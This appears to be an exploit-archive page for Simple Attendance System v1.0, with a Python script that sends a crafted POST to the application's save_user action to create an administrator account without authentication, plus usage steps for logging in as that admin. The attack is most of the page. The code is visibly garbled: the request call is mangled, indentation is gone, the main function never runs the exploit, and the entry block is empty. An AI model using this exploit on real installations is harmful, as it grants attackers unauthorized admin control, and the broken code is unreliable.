Simple Attendance System 1.0 Authentication Bypass

Simple Attendance System version 1.0 authentication bypass exploit that adds an administrator.

MD5 | b2f87481c6c45cf469745634e60b237d

# Exploit Title: Simple Attendance System v1.0 - Unauthenticated Add Admin Account
# Exploit Author: Richard Jones
# Date: September 26, 2021
# Vendor Homepage:
# Software Link:
# Tested on: Kali Linux, Apache, Mysql
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Simple Attendance System v1.0 v1.0 suffers Unauthenticated Add Administration Account. We can craft a post request to add an admin account to the applicaiton without authentication.

# Usage: python3 -u admin1 -p admin1 -url http://localhost/attendance/
# Then login to the app at http://localhost/attendance/login.php to be logged as admin.

import requests
import argparse

def createAccount(args):
data = f'id=&fullname={args.username}&username={args.password}&type=1'
headers = {"Content-Type": "application/x-www-form-urlencoded"}
r ="{}Actions.php?a=save_user", data=data, headers=headers)
if r. status_code == 200:
resp = r.text
if "Username already exists." in resp:
print(f"Username \"{args.username}\" taken!\nChange it and try again. ")
if "New User successfully saved." in resp:
print("Created User")
print(f"Username: {args.username}\nPassword: {args.password}")
print(f"\nPlease try to login here: {args.url}login.php")
print("Unknown Error, Check URL and try again.")

def main():
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--username", help="Username to create", required=True)
parser.add_argument("-p", "--password", help="Password for the user account", required=True)
parser.add_argument("-url", "--host", help="Host for the webapp eg: http://localhost/attendance/ << ends with / ", required=True)
args = parser.parse_args()


if __name__ == "__main__":

Related Posts